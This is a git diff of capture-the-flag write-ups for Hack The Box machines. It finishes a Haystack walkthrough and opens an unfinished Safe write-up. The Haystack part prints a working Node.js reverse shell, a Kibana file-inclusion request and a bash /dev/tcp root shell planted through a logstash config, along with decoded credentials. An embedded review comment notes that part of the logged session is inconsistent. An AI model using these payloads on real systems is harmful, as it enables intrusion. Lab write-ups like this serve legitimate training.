+ → echo "bGEgYWd1amEgZW4gZWwgcGFqYXIgZXMgImNsYXZlIg==" | base64 -d
+ la aguja en el pajar es "clave"
+
+
+Translating it from spanish it says "the needle in the haystack is "key" "
+
+
+ λ root [ 10.10.14.10/23 ] [nihilist/_HTB/Haystack]
+ → nmap -F 10.10.10.115 --top-ports 10000 -vvv
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-15 10:14 GMT
+ Initiating Ping Scan at 10:14
+ Scanning 10.10.10.115 [4 ports]
+ Completed Ping Scan at 10:14, 0.14s elapsed (1 total hosts)
+ Initiating SYN Stealth Scan at 10:14
+ Scanning haystack.htb (10.10.10.115) [8320 ports]
+ Discovered open port 80/tcp on 10.10.10.115
+ Discovered open port 22/tcp on 10.10.10.115
+ Discovered open port 9200/tcp on 10.10.10.115
+ Completed SYN Stealth Scan at 10:15, 29.20s elapsed (8320 total ports)
+ Nmap scan report for haystack.htb (10.10.10.115)
+ Host is up, received echo-reply ttl 63 (0.11s latency).
+ Scanned at 2020-02-15 10:14:40 GMT for 30s
+ Not shown: 8317 filtered ports
+ Reason: 8283 no-responses and 34 host-prohibiteds
+ PORT STATE SERVICE REASON
+ 22/tcp open ssh syn-ack ttl 63
+ 80/tcp open http syn-ack ttl 63
+ 9200/tcp open wap-wsp syn-ack ttl 63
+
+ Read data files from: /usr/bin/../share/nmap
+ Nmap done: 1 IP address (1 host up) scanned in 29.50 seconds
+ Raw packets sent: 16621 (731.300KB) | Rcvd: 330 (73.816KB)
+
+
+looks like we have another port to work with, 9200 is running something, let's find out what it is with the -sCV flag.
+
+
+ λ root [ 10.10.14.10/23 ] [nihilist/_HTB/Haystack]
+ → nmap -sCV -p9200 10.10.10.115
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-15 10:16 GMT
+ Nmap scan report for haystack.htb (10.10.10.115)
+ Host is up (0.094s latency).
+
+ PORT STATE SERVICE VERSION
+ 9200/tcp open http nginx 1.12.2
+ | http-methods:
+ |_ Potentially risky methods: DELETE
+ |_http-server-header: nginx/1.12.2
+ |_http-title: Site doesn't have a title (application/json; charset=UTF-8).
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 15.14 seconds
+
+
+
+ λ root [ 10.10.14.10/23 ] [nihilist/_HTB/Haystack]
+ → curl -sk http://haystack.htb:9200
+ {
+ "name" : "iQEYHgS",
+ "cluster_name" : "elasticsearch",
+ "cluster_uuid" : "pjrX7V_gSFmJY-DxP4tCQg",
+ "version" : {
+ "number" : "6.4.2",
+ "build_flavor" : "default",
+ "build_type" : "rpm",
+ "build_hash" : "04711c2",
+ "build_date" : "2018-09-26T13:34:09.098244Z",
+ "build_snapshot" : false,
+ "lucene_version" : "7.4.0",
+ "minimum_wire_compatibility_version" : "5.6.0",
+ "minimum_index_compatibility_version" : "5.0.0"
+ },
+ "tagline" : "You Know, for Search"
+ }
+
+
+looks like we have to deal with an [elasticsearch](https://www.elastic.co/guide/en/elasticsearch/reference/current/targz.html) service, running curl once more into the /_cat/indices?v URL we find some information in a cluster.
+
+
+ λ root [ 10.10.14.10/23 ] [nihilist/_HTB/Haystack]
+ → curl -sk http://haystack.htb:9200/_cat/indices/\?v
+
+ health status index uuid pri rep docs.count docs.deleted store.size pri.store.size
+ green open .kibana 6tjAYZrgQ5CwwR0g6VOoRg 1 0 1 0 4kb 4kb
+ yellow open quotes ZG2D1IqkQNiNZmi2HRImnQ 5 1 253 0 262.7kb 262.7kb
+ yellow open bank eSVpNfCfREyYoVigNWcrMw 5 1 1000 0 483.2kb 483.2kb
+
+
+we see that indexes .kibana , quotes and bank are also opened, let's investigate them.
+
+
+ λ root [ 10.10.14.10/23 ] [nihilist/_HTB/Haystack]
+ → curl -X POST http://haystack.htb:9200/\/_search
+ {"error":{"root_cause":[{"type":"index_not_found_exception","reason":"no such index","resource.type":"index_or_alias","resource.id":"index","index_uuid":"_na_","index":"index"}],"type":"index_not_found_exception","reason":"no such index","resource.type":"index_or_alias","resource.id":"index","index_uuid":"_na_","index":"index"},"status":404}#
+ λ root [ 10.10.14.10/23 ] [nihilist/_HTB/Haystack]
+ → curl -X POST http://haystack.htb:9200/bank/_search
+ {"took":18,"timed_out":false,"_shards":{"total":5,"successful":5,"skipped":0,"failed":0},"hits":{"total":1000,"max_score":1.0,"hits":[{"_index":"bank","_type":"account","_id":"25","_score":1.0,"_source":{"account_number":25,"balance":40540,"firstname":"Virginia","lastname":"Ayala","age":39,"gender":"F","address":"171 Putnam Avenue","employer":"Filodyne","email":"virginiaayala@filodyne.com","city":"Nicholson","state":"PA"}},{"_index":"bank","_type":"account","_id":"44","_score":1.0,"_source":{"account_number":44,"balance":34487,"firstname":"Aurelia","lastname":"Harding","age":37,"gender":"M","address":"502 Baycliff Terrace","employer":"Orbalix","email":"aureliaharding@orbalix.com","city":"Yardville","state":"DE"}},{"_index":"bank","_type":"account","_id":"99","_score":1.0,"_source":{"account_number":99,"balance":47159,"firstname":"Ratliff","lastname":"Heath","age":39,"gender":"F","address":"806 Rockwell Place","employer":"Zappix","email":"ratliffheath@zappix.com","city":"Shaft","state":"ND"}},{"_index":"bank","_type":"account","_id":"119","_score":1.0,"_source":{"account_number":119,"balance":49222,"firstname":"Laverne","lastname":"Johnson","age":28,"gender":"F","address":"302 Howard Place","employer":"Senmei","email":"lavernejohnson@senmei.com","city":"Herlong","state":"DC"}},{"_index":"bank","_type":"account","_id":"126","_score":1.0,"_source":{"account_number":126,"balance":3607,"firstname":"Effie","lastname":"Gates","age":39,"gender":"F","address":"620 National Drive","employer":"Digitalus","email":"effiegates@digitalus.com","city":"Blodgett","state":"MD"}},{"_index":"bank","_type":"account","_id":"145","_score":1.0,"_source":{"account_number":145,"balance":47406,"firstname":"Rowena","lastname":"Wilkinson","age":32,"gender":"M","address":"891 Elton 
Street","employer":"Asimiline","email":"rowenawilkinson@asimiline.com","city":"Ripley","state":"NH"}},{"_index":"bank","_type":"account","_id":"183","_score":1.0,"_source":{"account_number":183,"balance":14223,"firstname":"Hudson","lastname":"English","age":26,"gender":"F","address":"823 Herkimer Place","employer":"Xinware","email":"hudsonenglish@xinware.com","city":"Robbins","state":"ND"}},{"_index":"bank","_type":"account","_id":"190","_score":1.0,"_source":{"account_number":190,"balance":3150,"firstname":"Blake","lastname":"Davidson","age":30,"gender":"F","address":"636 Diamond Street","employer":"Quantasis","email":"blakedavidson@quantasis.com","city":"Crumpler","state":"KY"}},{"_index":"bank","_type":"account","_id":"208","_score":1.0,"_source":{"account_number":208,"balance":40760,"firstname":"Garcia","lastname":"Hess","age":26,"gender":"F","address":"810 Nostrand Avenue","employer":"Quiltigen","email":"garciahess@quiltigen.com","city":"Brooktrails","state":"GA"}},{"_index":"bank","_type":"account","_id":"222","_score":1.0,"_source":{"account_number":222,"balance":14764,"firstname":"Rachelle","lastname":"Rice","age":36,"gender":"M","address":"333 Narrows Avenue","employer":"Enaut","email":"rachellerice@enaut.com","city":"Wright","state":"AZ"}}]}}
+
+
+as you can see, this dumps alot of json data, let's use a tool called [elasticdump](https://github.com/taskrabbit/elasticsearch-dump) instead.
+
+
+ λ root [ 10.10.14.10/23 ] [nihilist/_HTB/Haystack]
+ → npm install elasticdump -g
+ npm WARN deprecated request@2.88.2: request has been deprecated, see https://github.com/request/request/issues/3142
+ npm WARN deprecated s3signed@0.1.0: This module is no longer maintained. It is provided as is.
+ /usr/local/bin/elasticdump -> /usr/local/lib/node_modules/elasticdump/bin/elasticdump
+ /usr/local/bin/multielasticdump -> /usr/local/lib/node_modules/elasticdump/bin/multielasticdump
+ + elasticdump@6.21.0
+ added 103 packages from 146 contributors in 12.289s
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Haystack]
+ → elasticdump --input=http://10.10.10.115:9200/quotes --output=quotes.json --type=data
+ Sat, 15 Feb 2020 10:45:50 GMT | starting dump
+ Sat, 15 Feb 2020 10:45:51 GMT | got 100 objects from source elasticsearch (offset: 0)
+ Sat, 15 Feb 2020 10:45:51 GMT | sent 100 objects to destination file, wrote 100
+ Sat, 15 Feb 2020 10:45:52 GMT | got 100 objects from source elasticsearch (offset: 100)
+ Sat, 15 Feb 2020 10:45:52 GMT | sent 100 objects to destination file, wrote 100
+ Sat, 15 Feb 2020 10:45:52 GMT | got 53 objects from source elasticsearch (offset: 200)
+ Sat, 15 Feb 2020 10:45:52 GMT | sent 53 objects to destination file, wrote 53
+ Sat, 15 Feb 2020 10:45:52 GMT | got 0 objects from source elasticsearch (offset: 253)
+ Sat, 15 Feb 2020 10:45:52 GMT | Total Writes: 253
+ Sat, 15 Feb 2020 10:45:52 GMT | dump complete
+
+
+
+earlier on, needle.jpg yielded a hint for us, which was the word "clave" , let's grep for it
+
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Haystack]
+ → cat quotes.json| grep clave
+ {"_index":"quotes","_type":"quote","_id":"111","_score":1,"_source":{"quote":"Esta clave no se puede perder, la guardo aca: cGFzczogc3BhbmlzaC5pcy5rZXk="}}
+ {"_index":"quotes","_type":"quote","_id":"45","_score":1,"_source":{"quote":"Tengo que guardar la clave para la maquina: dXNlcjogc2VjdXJpdHkg "}}
+
+
+looks like we have 2 base64 strings to decrypt, let's see what we get
+
+
+ λ root [ 10.10.14.10/23 ] [nihilist/_HTB/Haystack]
+ → echo "cGFzczogc3BhbmlzaC5pcy5rZXk=" | base64 -d
+ pass: spanish.is.key
+ λ root [ 10.10.14.10/23 ] [nihilist/_HTB/Haystack]
+ → echo "dXNlcjogc2VjdXJpdHkg" | base64 -d
+ user: security
+
+
+looks like we have credentials ! security:spanish.is.key, let's try to log in via ssh
+
+
+ λ root [ 10.10.14.10/23 ] [nihilist/_HTB/Haystack]
+ → ssh security@haystack.htb
+ The authenticity of host 'haystack.htb (10.10.10.115)' can't be established.
+ ECDSA key fingerprint is SHA256:ihn2fPA4jrn1hytN0y9Z3vKpIKuL4YYe3yuESD76JeA.
+ Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
+ Warning: Permanently added 'haystack.htb,10.10.10.115' (ECDSA) to the list of known hosts.
+ security@haystack.htb's password:
+ Last login: Wed Feb 6 20:53:59 2019 from 192.168.2.154
+ [security@haystack ~]$ uname -a
+ Linux haystack 3.10.0-957.1.3.el7.x86_64 #1 SMP Thu Nov 29 14:49:43 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
+ [security@haystack ~]$ cat /home/security/user.txt
+ 04XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And that's it ! we have the user flag :)
+
+## **Part 3 : Getting Root Access**
+
+In order to escalate privileges on the box, let's see if we can run the sudo -l command.
+
+
+ [security@haystack ~]$ sudo -l
+
+ We trust you have received the usual lecture from the local System
+ Administrator. It usually boils down to these three things:
+
+ #1) Respect the privacy of others.
+ #2) Think before you type.
+ #3) With great power comes great responsibility.
+
+ [sudo] password for security:
+ Sorry, user security may not run sudo on haystack.
+
+
+Out of luck, let's try printing out the contents of /etc/passwd
+
+
+ [security@haystack ~]$ cat /etc/passwd
+ root:x:0:0:root:/root:/bin/bash
+ bin:x:1:1:bin:/bin:/sbin/nologin
+ daemon:x:2:2:daemon:/sbin:/sbin/nologin
+ adm:x:3:4:adm:/var/adm:/sbin/nologin
+ lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
+ sync:x:5:0:sync:/sbin:/bin/sync
+ shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
+ halt:x:7:0:halt:/sbin:/sbin/halt
+ mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
+ operator:x:11:0:operator:/root:/sbin/nologin
+ games:x:12:100:games:/usr/games:/sbin/nologin
+ ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
+ nobody:x:99:99:Nobody:/:/sbin/nologin
+ systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
+ dbus:x:81:81:System message bus:/:/sbin/nologin
+ polkitd:x:999:998:User for polkitd:/:/sbin/nologin
+ sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
+ postfix:x:89:89::/var/spool/postfix:/sbin/nologin
+ chrony:x:998:996::/var/lib/chrony:/sbin/nologin
+ security:x:1000:1000:security:/home/security:/bin/bash
+ elasticsearch:x:997:995:elasticsearch user:/nonexistent:/sbin/nologin
+ logstash:x:996:994:logstash:/usr/share/logstash:/sbin/nologin
+ nginx:x:995:993:Nginx web server:/var/lib/nginx:/sbin/nologin
+ kibana:x:994:992:kibana service user:/home/kibana:/sbin/nologin
+
+
+let's check if there are any processes running for the user kibana using ps aux
+
+
+ [security@haystack ~]$ ps aux | grep kibana
+ kibana 6359 1.2 5.2 1344552 203872 ? Ssl 06:05 0:36 /usr/share/kibana/bin/../node/bin/node --no-warnings /usr/share/kibana/bin/../src/cli -c /etc/kibana/kibana.yml
+ security 17023 0.0 0.0 112708 972 pts/0 R+ 06:56 0:00 grep --color=auto kibana
+
+
+kibana has a config file stored in /etc/kibana/kibana.yml , let's try to read it's contents
+
+
+ [security@haystack ~]$ cat /etc/kibana/kibana.yml | grep port
+ # Kibana is served by a back end server. This setting specifies the port to use.
+ server.port: 5601
+
+
+Looks like there is an opened port on localhost (127.0.0.1) that is being used, haystack.htb:9200 revealed us earlier that it was running as version 6.4.2 which indicates an outdated service, with certain vulnerabilities for us to [exploit](https://github.com/mpgn/CVE-2018-17246)
+
+_Terminal 1:_
+
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Haystack]
+ → nano nihilist.js
+
+
+
+ (function(){
+ var net = require("net"),
+ cp = require("child_process"),
+ sh = cp.spawn("/bin/sh", []);
+ var client = new net.Socket();
+ client.connect(9001, "10.10.14.10", function(){
+ client.pipe(sh.stdin);
+ sh.stdout.pipe(client);
+ sh.stderr.pipe(client);
+ });
+ return /a/; // Prevents the Node.js application form crashing
+ })();
+
+
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Haystack]
+ → python -m SimpleHTTPServer 8080
+ Serving HTTP on 0.0.0.0 port 8080 ...
+
+
+_Terminal 2:_
+
+
+ [security@haystack]$ cd /tmp && curl http://10.10.14.10:8080/nihilist.js > nihilist.js
+ % Total % Received % Xferd Average Speed Time Time Time Current
+ Dload Upload Total Spent Left Speed
+ 100 382 100 382 0 0 1916 0 --:--:-- --:--:-- --:--:-- 1929
+ [security@haystack tmp]$ ls
+ nihilist.js
+ hsperfdata_root
+ jruby-6366
+ systemd-private-a242aff03786477b8fe05cbbaae15c33-chronyd.service-bOL8g5
+ systemd-private-a242aff03786477b8fe05cbbaae15c33-elasticsearch.service-DDSUOI
+ systemd-private-a242aff03786477b8fe05cbbaae15c33-nginx.service-Vji3Rm
+ vmware-root
+ vmware-root_6751-3887503186
+
+
+_Terminal 1:_
+
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Haystack]
+ → cat nihilist.js
+ (function(){
+ var net = require("net"),
+ cp = require("child_process"),
+ sh = cp.spawn("/bin/sh", []);
+ var client = new net.Socket();
+ client.connect(9001, "10.10.14.10", function(){
+ client.pipe(sh.stdin);
+ sh.stdout.pipe(client);
+ sh.stderr.pipe(client);
+ });
+ return /a/; // Prevents the Node.js application form crashing
+ })();
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Haystack]
+ → nc -lvnp 9001
+ listening on [any] 9001 ...
+
+
+_Terminal 2:_
+
+
+ [security@haystack tmp]$ curl 127.0.0.1:5601/api/console/api_server?apis=../../../../../../../tmp/nihilist.js
+
+
+_Terminal 1:_
+
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Haystack]
+ → nc -lvnp 9001
+ listening on [any] 9001 ...
+ connect to [10.10.14.10] from (UNKNOWN) [10.10.10.115] 55450
+ uname -a
+ Linux haystack 3.10.0-957.1.3.el7.x86_64 #1 SMP Thu Nov 29 14:49:43 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
+ cat /root/root.txt
+ cat: /root/root.txt: Permiso denegado
+
+
+it connected back ! but we still need to escalate privileges... let's check out /etc/logstash/conf.d/
+
+
+ bash-4.2$ pwd
+ pwd
+ /
+ bash-4.2$ cd /etc/logstash/conf.d
+ cd /etc/logstash/conf.d
+ bash-4.2$ ls -lash
+ ls -lash
+ total 12K
+ 0 drwxrwxr-x. 2 root kibana 62 jun 24 2019 .
+ 0 drwxr-xr-x. 3 root root 183 jun 18 2019 ..
+ 4,0K -rw-r-----. 1 root kibana 131 jun 20 2019 filter.conf
+ 4,0K -rw-r-----. 1 root kibana 186 jun 24 2019 input.conf
+ 4,0K -rw-r-----. 1 root kibana 109 jun 24 2019 output.conf
+
+
+here we see a few config files, let's see what their contents are.
+
+
+ bash-4.2$ cat input.conf
+ cat input.conf
+ input {
+ file {
+ path => "/opt/kibana/logstash_*"
+ start_position => "beginning"
+ sincedb_path => "/dev/null"
+ stat_interval => "10 second"
+ type => "execute"
+ mode => "read"
+ }
+ }
+ bash-4.2$ cat output.conf
+ cat output.conf
+ output {
+ if [type] == "execute" {
+ stdout { codec => json }
+ exec {
+ command => "%{comando} &"
+ }
+ }
+ }
+ bash-4.2$ cat filter.conf
+ cat filter.conf
+ filter {
+ if [type] == "execute" {
+ grok {
+ match => { "message" => "Ejecutar\s*comando\s*:\s+%{GREEDYDATA:comando}" }
+ }
+ }
+ }
+
+
+looking at the config files it means that we can have code execution from the /opt/kibana directory if we create a reverse shell script named logstash_a, so let's do it :
+
+
+ bash-4.2$ cd /opt/kibana
+ cd /opt/kibana
+ bash-4.2$ echo 'Ejecutar comando : bash -i >& /dev/tcp/10.10.14.10/9002 0>&1' > logstash_a
+ echo 'bash -i >& /dev/tcp/10.10.14.10/9002 0>&1' > logstash_a
+ bash-4.2$ cat logstash_a
+ cat logstash_a
+ bash -i >& /dev/tcp/10.10.14.10/9002 0>&1
+ bash-4.2$ chmod +x logstash_a
+ chmod +x logstash_a
+ bash-4.2$ ls -lash
+ ls -lash
+ total 4,0K
+ 0 drwxr-x---. 2 kibana kibana 24 feb 15 10:43 .
+ 0 drwxr-xr-x. 3 root root 20 jun 18 2019 ..
+ 4,0K -rwxr-xr-x. 1 kibana kibana 61 feb 15 10:43 logstash_a
+
+
+Waiting a bit more than the announced 10s in the config files earlier, for the connection to come back to us, but on the 9002nd port, with another netcat command ready to catch it
+
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Haystack]
+ → nc -lvnp 9002
+ listening on [any] 9002 ...
+ ls
+ connect to [10.10.14.10] from (UNKNOWN) [10.10.10.115] 57954
+ bash: no hay control de trabajos en este shell
+ [root@haystack /]#
+ [root@haystack /]# cat /root/root.txt
+ cat /root/root.txt
+ 3fXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+and that's it ! we have been able to escalate privileges and printing out the root flag of the box.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
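Review bot: the logstash_a transcript contradicts itself: the command typed is `echo 'Ejecutar comando : bash -i >& /dev/tcp/10.10.14.10/9002 0>&1' > logstash_a`, but the echoed command and the following `cat logstash_a` show only `bash -i >& /dev/tcp/10.10.14.10/9002 0>&1`, which the grok pattern `Ejecutar\s*comando\s*:\s+%{GREEDYDATA:comando}` in filter.conf would not match, so the exec output would never fire; paste the session that was actually run. The paragraph after the kibana.yml grep mixes up the two services: 6.4.2 was reported by Elasticsearch on 9200, whereas CVE-2018-17246 is a Kibana local file inclusion reached through the console API on 5601, and the grep for `port` never shows `server.host`, so add the line that proves Kibana is bound to 127.0.0.1 (for example `grep -E 'server\.(host|port)' /etc/kibana/kibana.yml`) and state Kibana's version rather than Elasticsearch's. The privilege escalation works because logstash, running as root, executes the `%{comando}` field of any file the kibana user can drop under /opt/kibana; a one-line mitigation note in the conclusion (run logstash as an unprivileged user, never pass an interpolated field to the exec output) would make the write-up instructive rather than only descriptive. Smaller points: base64 is an encoding, so "decrypt" should read "decode" in both places it appears; the reverse-shell comment has a typo ("form crashing" should be "from crashing"); and the Conclusion ends with "Here we can see the progress graph :" followed by nothing, so the image is missing from the commit.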
diff --git a/Easy/35.md b/Easy/35.md
new file mode 100644
index 0000000..f03c1a1
--- /dev/null
+++ b/Easy/35.md
@@ -0,0 +1,883 @@
+# Safe Writeup
+
+
+
+## Introduction :
+
+Safe is an easy Linux box that was released back in July 2019.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Safe]
+ → nmap -F 10.10.10.147 --top-ports 10000 -vvv
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-15 16:08 GMT
+ Initiating Ping Scan at 16:08
+ Scanning 10.10.10.147 [2 ports]
+ Completed Ping Scan at 16:08, 0.09s elapsed (1 total hosts)
+ Initiating Parallel DNS resolution of 1 host. at 16:08
+ Completed Parallel DNS resolution of 1 host. at 16:08, 0.01s elapsed
+ DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
+ Initiating Connect Scan at 16:08
+ Scanning 10.10.10.147 [8320 ports]
+ Discovered open port 22/tcp on 10.10.10.147
+ Discovered open port 80/tcp on 10.10.10.147
+ Increasing send delay for 10.10.10.147 from 0 to 5 due to 57 out of 189 dropped probes since last increase.
+ Connect Scan Timing: About 24.46% done; ETC: 16:10 (0:01:36 remaining)
+ Connect Scan Timing: About 48.59% done; ETC: 16:10 (0:01:05 remaining)
+ Increasing send delay for 10.10.10.147 from 5 to 10 due to max_successful_tryno increase to 4
+ Discovered open port 1337/tcp on 10.10.10.147
+ Connect Scan Timing: About 70.69% done; ETC: 16:10 (0:00:38 remaining)
+ Increasing send delay for 10.10.10.147 from 10 to 20 due to max_successful_tryno increase to 5
+ Completed Connect Scan at 16:11, 147.37s elapsed (8320 total ports)
+ Nmap scan report for 10.10.10.147
+ Host is up, received syn-ack (0.095s latency).
+ Scanned at 2020-02-15 16:08:45 GMT for 148s
+ Not shown: 8317 closed ports
+ Reason: 8317 conn-refused
+ PORT STATE SERVICE REASON
+ 22/tcp open ssh syn-ack
+ 80/tcp open http syn-ack
+ 1337/tcp open waste syn-ack
+
+ Read data files from: /usr/bin/../share/nmap
+ Nmap done: 1 IP address (1 host up) scanned in 147.55 seconds
+
+
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Safe]
+ → nmap -sCV -p22,80,1337 10.10.10.147
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-15 16:11 GMT
+ Nmap scan report for 10.10.10.147
+ Host is up (0.096s latency).
+
+ PORT STATE SERVICE VERSION
+ 22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
+ | ssh-hostkey:
+ | 2048 6d:7c:81:3d:6a:3d:f9:5f:2e:1f:6a:97:e5:00:ba:de (RSA)
+ | 256 99:7e:1e:22:76:72:da:3c:c9:61:7d:74:d7:80:33:d2 (ECDSA)
+ |_ 256 6a:6b:c3:8e:4b:28:f7:60:85:b1:62:ff:54:bc:d8:d6 (ED25519)
+ 80/tcp open http Apache httpd 2.4.25 ((Debian))
+ |_http-server-header: Apache/2.4.25 (Debian)
+ |_http-title: Apache2 Debian Default Page: It works
+ 1337/tcp open waste?
+ | fingerprint-strings:
+ | DNSStatusRequestTCP:
+ | 10:13:12 up 4 min, 0 users, load average: 0.00, 0.02, 0.00
+ | DNSVersionBindReqTCP:
+ | 10:13:07 up 3 min, 0 users, load average: 0.00, 0.02, 0.00
+ | GenericLines:
+ | 10:12:55 up 3 min, 0 users, load average: 0.00, 0.02, 0.00
+ | What do you want me to echo back?
+ | GetRequest:
+ | 10:13:02 up 3 min, 0 users, load average: 0.00, 0.02, 0.00
+ | What do you want me to echo back? GET / HTTP/1.0
+ | HTTPOptions:
+ | 10:13:02 up 3 min, 0 users, load average: 0.00, 0.02, 0.00
+ | What do you want me to echo back? OPTIONS / HTTP/1.0
+ | Help:
+ | 10:13:17 up 4 min, 0 users, load average: 0.00, 0.02, 0.00
+ | What do you want me to echo back? HELP
+ | NULL:
+ | 10:12:55 up 3 min, 0 users, load average: 0.00, 0.02, 0.00
+ | RPCCheck:
+ | 10:13:02 up 3 min, 0 users, load average: 0.00, 0.02, 0.00
+ | RTSPRequest:
+ | 10:13:02 up 3 min, 0 users, load average: 0.00, 0.02, 0.00
+ | What do you want me to echo back? OPTIONS / RTSP/1.0
+ | SSLSessionReq, TLSSessionReq, TerminalServerCookie:
+ | 10:13:18 up 4 min, 0 users, load average: 0.00, 0.02, 0.00
+ |_ What do you want me to echo back?
+ 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
+ SF-Port1337-TCP:V=7.80%I=7%D=2/15%Time=5E481843%P=x86_64-pc-linux-gnu%r(NU
+ SF:LL,3E,"\x2010:12:55\x20up\x203\x20min,\x20\x200\x20users,\x20\x20load\x
+ SF:20average:\x200\.00,\x200\.02,\x200\.00\n")%r(GenericLines,63,"\x2010:1
+ SF:2:55\x20up\x203\x20min,\x20\x200\x20users,\x20\x20load\x20average:\x200
+ SF:\.00,\x200\.02,\x200\.00\n\nWhat\x20do\x20you\x20want\x20me\x20to\x20ec
+ SF:ho\x20back\?\x20\r\n")%r(GetRequest,71,"\x2010:13:02\x20up\x203\x20min,
+ SF:\x20\x200\x20users,\x20\x20load\x20average:\x200\.00,\x200\.02,\x200\.0
+ SF:0\n\nWhat\x20do\x20you\x20want\x20me\x20to\x20echo\x20back\?\x20GET\x20
+ SF:/\x20HTTP/1\.0\r\n")%r(HTTPOptions,75,"\x2010:13:02\x20up\x203\x20min,\
+ SF:x20\x200\x20users,\x20\x20load\x20average:\x200\.00,\x200\.02,\x200\.00
+ SF:\n\nWhat\x20do\x20you\x20want\x20me\x20to\x20echo\x20back\?\x20OPTIONS\
+ SF:x20/\x20HTTP/1\.0\r\n")%r(RTSPRequest,75,"\x2010:13:02\x20up\x203\x20mi
+ SF:n,\x20\x200\x20users,\x20\x20load\x20average:\x200\.00,\x200\.02,\x200\
+ SF:.00\n\nWhat\x20do\x20you\x20want\x20me\x20to\x20echo\x20back\?\x20OPTIO
+ SF:NS\x20/\x20RTSP/1\.0\r\n")%r(RPCCheck,3E,"\x2010:13:02\x20up\x203\x20mi
+ SF:n,\x20\x200\x20users,\x20\x20load\x20average:\x200\.00,\x200\.02,\x200\
+ SF:.00\n")%r(DNSVersionBindReqTCP,3E,"\x2010:13:07\x20up\x203\x20min,\x20\
+ SF:x200\x20users,\x20\x20load\x20average:\x200\.00,\x200\.02,\x200\.00\n")
+ SF:%r(DNSStatusRequestTCP,3E,"\x2010:13:12\x20up\x204\x20min,\x20\x200\x20
+ SF:users,\x20\x20load\x20average:\x200\.00,\x200\.02,\x200\.00\n")%r(Help,
+ SF:67,"\x2010:13:17\x20up\x204\x20min,\x20\x200\x20users,\x20\x20load\x20a
+ SF:verage:\x200\.00,\x200\.02,\x200\.00\n\nWhat\x20do\x20you\x20want\x20me
+ SF:\x20to\x20echo\x20back\?\x20HELP\r\n")%r(SSLSessionReq,64,"\x2010:13:18
+ SF:\x20up\x204\x20min,\x20\x200\x20users,\x20\x20load\x20average:\x200\.00
+ SF:,\x200\.02,\x200\.00\n\nWhat\x20do\x20you\x20want\x20me\x20to\x20echo\x
+ SF:20back\?\x20\x16\x03\n")%r(TerminalServerCookie,63,"\x2010:13:18\x20up\
+ SF:x204\x20min,\x20\x200\x20users,\x20\x20load\x20average:\x200\.00,\x200\
+ SF:.02,\x200\.00\n\nWhat\x20do\x20you\x20want\x20me\x20to\x20echo\x20back\
+ SF:?\x20\x03\n")%r(TLSSessionReq,64,"\x2010:13:18\x20up\x204\x20min,\x20\x
+ SF:200\x20users,\x20\x20load\x20average:\x200\.00,\x200\.02,\x200\.00\n\nW
+ SF:hat\x20do\x20you\x20want\x20me\x20to\x20echo\x20back\?\x20\x16\x03\n");
+ Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 95.74 seconds
+
+
+## **Part 2 : Getting User Access**
+
+the text goes here
+
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Safe]
+ → nikto -h http://10.10.10.147/
+ - Nikto v2.1.6
+ ---------------------------------------------------------------------------
+ + Target IP: 10.10.10.147
+ + Target Hostname: 10.10.10.147
+ + Target Port: 80
+ + Start Time: 2020-02-15 16:33:18 (GMT0)
+ ---------------------------------------------------------------------------
+ + Server: Apache/2.4.25 (Debian)
+ + The anti-clickjacking X-Frame-Options header is not present.
+ + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ + No CGI Directories found (use '-C all' to force check all possible dirs)
+ + Server may leak inodes via ETags, header found with file /, inode: 2a23, size: 588c4cc4e54b5, mtime: gzip
+ + Apache/2.4.25 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ + Allowed HTTP Methods: POST, OPTIONS, HEAD, GET
+ + OSVDB-3092: /manual/: Web server manual found.
+ + OSVDB-3268: /manual/images/: Directory indexing found.
+ + OSVDB-3233: /icons/README: Apache default file found.
+ + 7863 requests: 0 error(s) and 9 item(s) reported on remote host
+ + End Time: 2020-02-15 16:46:54 (GMT0) (816 seconds)
+ ---------------------------------------------------------------------------
+ + 1 host(s) tested
+
+
+Let's run dirsearch to see which directories we can find :
+
+
